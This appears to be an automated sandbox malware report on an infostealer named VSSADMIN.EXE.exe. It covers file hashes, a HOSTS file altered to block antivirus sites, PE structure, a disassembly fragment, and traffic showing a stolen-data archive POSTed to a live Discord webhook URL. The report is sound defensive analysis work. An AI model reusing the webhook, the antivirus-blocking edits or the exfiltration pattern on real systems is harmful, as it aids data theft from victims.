                                                                                                                                                                    SHA-512:BF083FF9D5C73B93F93DD4E8E15B0FD7B759033B16661BBAC6107883841B18159449B514F506F230F41A35DE45BF2E8D41516BB0129B46576D15F0562E708613
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.0.cs"
                                                                                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4096
                                                                                                                                                                    Entropy (8bit):3.152074880959527
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:6g7oEAtf0KhzBU/3Vf6mtJON0eDpW1ulla35q:4Nz03smWO+XK
                                                                                                                                                                    MD5:6C615C9F69DE3470B75D17B7EEAE8D9A
                                                                                                                                                                    SHA1:84B2CA6CD6605FBDD46E44158BAC97F5273C2EF9
                                                                                                                                                                    SHA-256:49E33F45A698837C016A60DE76044C9EF4A54FE950844A56308D9CA9743460BD
                                                                                                                                                                    SHA-512:3F9D803F7972BBF1E1A607B57595AB99572A85433B9A0939BE492769EDED5CD784F2BE5DA9423C84F45D3C5A2E3F10F6941F2FEFAD5DAE097E0D0CA08E663667
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):1149
                                                                                                                                                                    Entropy (8bit):5.492138476285278
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:KJfNgxId3ka6KOkqeFkOfww1EifwvKaMD5DqBVKVrdFAMBJTH:uN4kka6NkqeFkyww1EuwvKdDcVKdBJj
                                                                                                                                                                    MD5:354D53318AF746A761D58800790D3D7D
                                                                                                                                                                    SHA1:FD53D7B16B76B26B4C3FD20385B88738D01D17B8
                                                                                                                                                                    SHA-256:A7962FDA9ECB29AC21FAEFE1F192E193965501C5A29AADB79BC3C709C21E0347
                                                                                                                                                                    SHA-512:D81F62EF115CEA7C59DFCF997CC116B601257389ED111F0B0C972E9CB924AC7AADB4209FCD83C9D484295D7C751A176C44F8C51A8AA3B2F7A41183DD4851B4D5
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ozweafg0\ozweafg0.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe
                                                                                                                                                                    Process:C:\Users\user\Desktop\VSSADMIN.EXE.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2280
                                                                                                                                                                    Entropy (8bit):4.598600285734304
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:vDZhyoZWM9rU5fFc7ikBp32/Vy5L1vV7XnScMO:vDZEurK9K3Sw5VV7XnN
                                                                                                                                                                    MD5:23C7D0CF7F534AE4B1E210C2B9AC0A49
                                                                                                                                                                    SHA1:5B7932066BE03CC3C16912B00969F72A325620B9
                                                                                                                                                                    SHA-256:C5BB8C177321FC5049EB083B1DD40FFB0AC62AA139D1BF524613E75154E9C365
                                                                                                                                                                    SHA-512:85A6900CE87AC3D6458EA482CD12E08B5B3E7F2FC2E54C5DD0D087B9667F56BD9C49BD5BB6A76C6BE66826CD241B6F889269716871470BCE1AEFCE05B0D2C85C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com...0.0.0.0 www.virustotal.com...0.0.0.0 avast.com...0.0.0.0 www.avast.com...0.0.0.0 totalav.com...0.0.0.0 www.totalav.com...0.0.0.0 scanguard.com...0.0.0
                                                                                                                                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):97
                                                                                                                                                                    Entropy (8bit):4.331807756485642
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                    MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                    SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                    SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                    SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
                                                                                                                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                    Entropy (8bit):7.992692630132626
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: VSSADMIN.EXE.exe
File size: 7'380'816 bytes
MD5: b8e16b93be678043ec587ec1c759c2de
SHA1: a8c98ba05ac710a92c4df15956f81cf81073746f
SHA256: 15dd97919ebcb246add4fc9e9b201bdd67da510c79f8d89cb4edc7fbf64858fa
SHA512: 43728e686d684998e6e80344e7a0f05caa106262cebc5b5815619b74ea7856dab13b2954085e188d7ec3b96581390d86a4d4bef13c3fda9fd26844a9494d571f
SSDEEP: 98304:9jzHqdVfB2GyuT/9vUIdD9C+z3zO917vOTh+ezsNh75S2zh/hQqIvmJ1YPFlVtqU:9PQsGbT/9bvLz3S1bA32zOqxYPdH
TLSH: A57633DAA3C109F4D477C63DC2C28945DAB5752B03A4DA8F03B466B61F1BAD48D3BB12
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............r...r...r...q...r...w.'.r...v...r.<.....r.<.w...r.<.v...r.<.q...r...s...r...s...r...v...r...p...r.Rich..r................
Icon Hash: 367cdccfcfcfc644
Entrypoint: 0x14000b340
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp: 0x65046D71 [Fri Sep 15 14:42:57 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 2
File Version Major: 5
File Version Minor: 2
Subsystem Version Major: 5
Subsystem Version Minor: 2
Import Hash: 0b5552dccd9d0a834cea55c0c8fc05be
Signature Valid: false
Signature Issuer: CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After:
• 9/29/2021 2:00:00 AM, 9/29/2024 1:59:59 AM
Subject Chain:
• CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
Version: 3
Thumbprint MD5: 5C82B2D08EFE6EE0794B52D4309C5F37
Thumbprint SHA-1: 3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
Thumbprint SHA-256: 60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
Serial: 00BFB15001BBF592D4962A7797EA736FA3
Instruction
dec eax
sub esp, 28h
call 00007F42F4E60CECh
dec eax
add esp, 28h
jmp 00007F42F4E608FFh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F42F4E61264h
test eax, eax
je 00007F42F4E60AA3h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F42F4E60A87h
dec eax
cmp ecx, eax
je 00007F42F4E60A96h
xor eax, eax
dec eax
cmpxchg dword ptr [000411ECh], ecx
jne 00007F42F4E60A70h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F42F4E60A79h
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
movzx eax, byte ptr [000411D7h]
test ecx, ecx
mov ebx, 00000001h
cmove eax, ebx
mov byte ptr [000411C7h], al
call 00007F42F4E61063h
call 00007F42F4E62192h
test al, al
jne 00007F42F4E60A86h
xor al, al
jmp 00007F42F4E60A96h
call 00007F42F4E6E771h
test al, al
jne 00007F42F4E60A8Bh
xor ecx, ecx
call 00007F42F4E621A2h
jmp 00007F42F4E60A6Ch
mov al, bl
dec eax
add esp, 20h
pop ebx
ret
int3
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [0004118Ch], 00000000h
mov ebx, ecx
jne 00007F42F4E60AE9h
cmp ecx, 01h
jnbe 00007F42F4E60AECh
call 00007F42F4E611CAh
test eax, eax
je 00007F42F4E60AAAh
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x3bcd4          0x78          .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x52000          0x4b4c        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x4e000          0x20a0        .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY        0x707b08         0x2448
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x57000          0x758         .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x39480          0x1c          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x39340          0x140         .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2a000          0x418         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity      File Type                                    Entropy             Characteristics
.text   0x1000           0x28830       0x28a00   False     0.5571334134615384   data                                         6.48139234696373    IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata  0x2a000          0x12ade       0x12c00   False     0.5151302083333333   data                                         5.822756630008917   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data   0x3d000          0x103f8       0xe00     False     0.13309151785714285  DOS executable (block device driver \377\3)  1.8096886543499544  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata  0x4e000          0x20a0        0x2200    False     0.4749540441176471   data                                         5.22608226661587    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA  0x51000          0x15c         0x200     False     0.38671875           data                                         2.734076656433961   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc   0x52000          0x4b4c        0x4c00    False     0.8816303453947368   data                                         7.7097824687179575  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x57000          0x758         0x800     False     0.544921875          data                                         5.2576643703968475  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size    Type                                                        Language  Country  ZLIB Complexity
RT_ICON        0x52250  0x25c   PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced                      1.0182119205298013
RT_ICON        0x524ac  0x374   PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced                      1.012443438914027
RT_ICON        0x52820  0x495   PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced                      1.0093776641091219
RT_ICON        0x52cb8  0x681   PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced                      1.0066066066066066
RT_ICON        0x5333c  0x7f7   PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced                      1.0053948013732221
RT_ICON        0x53b34  0xdb7   PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced                    0.9982910851609228
RT_ICON        0x548ec  0x187d  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                    0.9487956611899825
RT_GROUP_ICON  0x5616c  0x68    data                                                                           0.75
RT_VERSION     0x561d4  0x3e8   data                                                                           0.448
RT_MANIFEST    0x565bc  0x58e   XML 1.0 document, ASCII text, with CRLF line terminators                       0.44655414908579466
DLL | Import
USER32.dll | CreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll |
KERNEL32.dll | GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, IsValidCodePage, GetACP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetOEMCP, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetEndOfFile, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll | OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll | SelectObject, DeleteObject, CreateFontIndirectW
TCP packets: Timestamp | Source Port | Dest Port | Source IP | Dest IP
UDP packets: Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 15, 2023 22:15:57.744563103 CEST | 192.168.2.4 | 8.8.8.8 | 0xcc3f | Standard query (0) | blank-2md3e.in | A (IP address) | IN (0x0001) | false
Sep 15, 2023 22:15:58.361323118 CEST | 192.168.2.4 | 8.8.8.8 | 0x5940 | Standard query (0) | blank-2md3e.in | A (IP address) | IN (0x0001) | false
Sep 15, 2023 22:15:58.484169960 CEST | 192.168.2.4 | 8.8.8.8 | 0xa01a | Standard query (0) | blank-2md3e.in | A (IP address) | IN (0x0001) | false
Sep 15, 2023 22:15:58.592437983 CEST | 192.168.2.4 | 8.8.8.8 | 0xdca4 | Standard query (0) | blank-2md3e.in | A (IP address) | IN (0x0001) | false
Sep 15, 2023 22:15:59.654330969 CEST | 192.168.2.4 | 8.8.8.8 | 0x287 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Sep 15, 2023 22:16:19.128405094 CEST | 192.168.2.4 | 8.8.8.8 | 0x9906 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Sep 15, 2023 22:16:19.757888079 CEST | 192.168.2.4 | 8.8.8.8 | 0x4f8e | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Sep 15, 2023 22:17:21.707096100 CEST | 192.168.2.4 | 8.8.8.8 | 0x3179 | Standard query (0) | tse1.mm.bing.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 15, 2023 22:15:58.351931095 CEST | 8.8.8.8 | 192.168.2.4 | 0xcc3f | Name error (3) | blank-2md3e.in | none | none | A (IP address) | IN (0x0001) | false
Sep 15, 2023 22:15:58.462224960 CEST | 8.8.8.8 | 192.168.2.4 | 0x5940 | Name error (3) | blank-2md3e.in | none | none | A (IP address) | IN (0x0001) | false
Sep 15, 2023 22:15:58.587532997 CEST | 8.8.8.8 | 192.168.2.4 | 0xa01a | Name error (3) | blank-2md3e.in | none | none | A (IP address) | IN (0x0001) | false
Sep 15, 2023 22:15:58.691107035 CEST | 8.8.8.8 | 192.168.2.4 | 0xdca4 | Name error (3) | blank-2md3e.in | none | none | A (IP address) | IN (0x0001) | false
Sep 15, 2023 22:15:59.760168076 CEST | 8.8.8.8 | 192.168.2.4 | 0x287 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Sep 15, 2023 22:16:19.235579967 CEST | 8.8.8.8 | 192.168.2.4 | 0x9906 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Sep 15, 2023 22:16:19.858509064 CEST | 8.8.8.8 | 192.168.2.4 | 0x4f8e | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Sep 15, 2023 22:16:19.858509064 CEST | 8.8.8.8 | 192.168.2.4 | 0x4f8e | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Sep 15, 2023 22:16:19.858509064 CEST | 8.8.8.8 | 192.168.2.4 | 0x4f8e | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Sep 15, 2023 22:16:19.858509064 CEST | 8.8.8.8 | 192.168.2.4 | 0x4f8e | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Sep 15, 2023 22:16:19.858509064 CEST | 8.8.8.8 | 192.168.2.4 | 0x4f8e | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Sep 15, 2023 22:17:21.809499025 CEST | 8.8.8.8 | 192.168.2.4 | 0x3179 | No error (0) | tse1.mm.bing.net | mm-mm.bing.net.trafficmanager.net | | CNAME (Canonical name) | IN (0x0001) | false
• discord.com
• ip-api.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49718 | 162.159.138.232 | 443 | C:\Users\user\Desktop\VSSADMIN.EXE.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49715 | 208.95.112.1 | 80 | C:\Users\user\Desktop\VSSADMIN.EXE.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2023 22:15:59.859786034 CEST | 9 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.0.4
Sep 15, 2023 22:15:59.958157063 CEST | 9 | IN | HTTP/1.1 200 OK
Date: Fri, 15 Sep 2023 20:15:59 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49717 | 208.95.112.1 | 80 | C:\Users\user\Desktop\VSSADMIN.EXE.exe
Timestamp | kBytes transferred | Direction | Data
Sep 15, 2023 22:16:19.333969116 CEST | 16 | OUT | GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
Accept-Encoding: identity
User-Agent: python-urllib3/2.0.4
Sep 15, 2023 22:16:19.459372044 CEST | 17 | IN | HTTP/1.1 200 OK
Date: Fri, 15 Sep 2023 20:16:19 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 166
Access-Control-Allow-Origin: *
X-Ttl: 40
X-Rl: 43
                                                                                                                                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 74 72 75 65 2c 22 71 75 65 72 79 22 3a 22 31 39 31 2e 39 36 2e 31 35 30 2e 32 30 39 22 7d
                                                                                                                                                                    Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"","mobile":false,"proxy":true,"query":"191.96.150.209"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49718 | 162.159.138.232 | 443 | C:\Users\user\Desktop\VSSADMIN.EXE.exe
Timestamp | kBytes transferred | Direction | Data
2023-09-15 20:16:20 UTC | 0 | OUT | POST /api/webhooks/1125357329798418472/yWPfp1iKyx0rkQloEOr9Xk-aX81R6WKX-1QBrT7zz3erb7v9flhr6ifTFvcDhFyRvu2k HTTP/1.1
Host: discord.com
Accept-Encoding: identity
Content-Length: 838652
User-Agent: python-urllib3/2.0.4
Content-Type: multipart/form-data; boundary=df04b12a7b80d1dae6cbaca19bb29ce2
                                                                                                                                                                    2023-09-15 20:16:20 UTC0OUTData Raw: 2d 2d 64 66 30 34 62 31 32 61 37 62 38 30 64 31 64 61 65 36 63 62 61 63 61 31 39 62 62 32 39 63 65 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 f1 55 78 45 21 04 00 00 01 0f 0f a7 d5 56 90 4a 8b ae 6c 0e 82 15 a1 26 96 55 c0 a3 3b 45 eb 35 16 eb c3 4d 31 10 06 5b d0 3b c2 db 7f 7a 2c 89 1e ca 5a a9 1c 4c 7a 12 cb ee 9f 26 66 e8 5b 07 b0 d6 99 79 d3 63 f1 e7 ba 57 5e e4 7f 70 fa f4 72 a2 13 6e aa 43 db 57 fb 22 d0 c6 61 0e c0 6c
                                                                                                                                                                    Data Ascii: --df04b12a7b80d1dae6cbaca19bb29ce2Content-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!UxE!VJl&U;E5M1[;z,ZLz&f[ycW^prnCW"al
                                                                                                                                                                    2023-09-15 20:16:20 UTC16OUTData Raw: 23 29 d9 70 54 31 5f 4b 03 79 42 64 10 6a f2 8d f2 09 de b3 3e 2e 8a 81 9f 16 d1 87 94 c9 59 38 a8 ae 8d cb dd 89 95 86 bd c6 36 1c 76 68 5b bc 46 bb fa 63 0d a7 0b 67 80 c4 8f 88 ab 2e 5b 3c 35 4c fc d3 06 4d cb 8f 0e 75 76 72 08 9c 63 1c d8 38 29 79 89 da 21 b8 e2 b9 42 49 a5 7b 07 48 00 9f fc 1f a6 89 1b 4a 1e b7 dd 35 b8 55 52 c4 54 8f 7f b5 3f 7b 10 8c 28 e5 b6 89 3d 05 4d 52 3f 28 37 ca 58 b8 d1 8c cf a0 a9 c8 d5 b9 b6 21 b4 be dc 1c 3a 76 e9 7a 6b 36 6a 9e 0a 7f e8 0b bf e7 ed 8a 74 5c ac 61 92 3a d7 9a 3c 40 9a 24 ec d5 a2 77 6f 1b e9 46 15 4f af 6e 3b 85 3e 6f 32 3b 03 b7 5e 45 f1 77 ae e2 ee d1 8e e8 73 85 c2 9e cd 13 d7 b2 ac e2 98 4f 02 bd 6d 53 d6 35 8b c5 cd 7b b4 0d 9a 67 03 01 6c ad 6d 48 2d 57 dd 03 37 45 d5 25 cc 99 6d 22 d9 62 15 16 e6
                                                                                                                                                                    Data Ascii: #)pT1_KyBdj>.Y86vh[Fcg.[<5LMuvrc8)y!BI{HJ5URT?{(=MR?(7X!:vzk6jt\a:<@$woFOn;>o2;^EwsOmS5{glmH-W7E%m"b
                                                                                                                                                                    2023-09-15 20:16:20 UTC32OUTData Raw: 47 4a c0 1c af 80 ef da 48 d8 6d 95 2e 9d aa 92 71 5a ff f5 7a 6b 79 2f 1a 7e 15 6a fa 9f 27 19 ec 10 37 ec 4e 7a 97 f0 55 2e 55 04 db 36 ad 04 74 6e 08 43 4f bb 5e 9e 7b b0 d4 d2 e4 4b 46 49 b9 a4 c4 24 62 97 52 92 5f 87 97 76 53 8d cb 89 62 5d a3 4a d3 50 ca 15 08 d6 cc 99 03 bc 4d 86 76 5b 7d a3 f3 51 01 78 8a aa 52 7b 45 75 21 c0 d9 b9 17 9b 2a e6 bc bd b8 5c 60 3f 47 0d 31 e2 8c c7 ee bf e0 3c ea fc 37 c8 6d 3e 39 3c 0e 9a bc db e0 d0 44 48 9b 1c 0c bc a0 9f 06 f7 9b 77 bb 4e 8f 73 76 18 2b 04 cb 16 dd 51 a0 ba 25 e4 57 ba 7e 18 da a5 1f e3 5c 59 c9 b7 8f 6f 4a 58 ea 8d 97 c8 2c 9e d4 df 4f 5b 8f 0b 1b a8 ff ae 2a 0b ae 59 d1 8f 02 f0 ec 72 c4 4e ac fe c2 49 d1 ca ed 13 6e 44 47 04 3e 14 36 3e 1c 20 89 f8 b8 d5 bc 54 bc a2 da 68 58 2f 3a 8c 18 32 fd
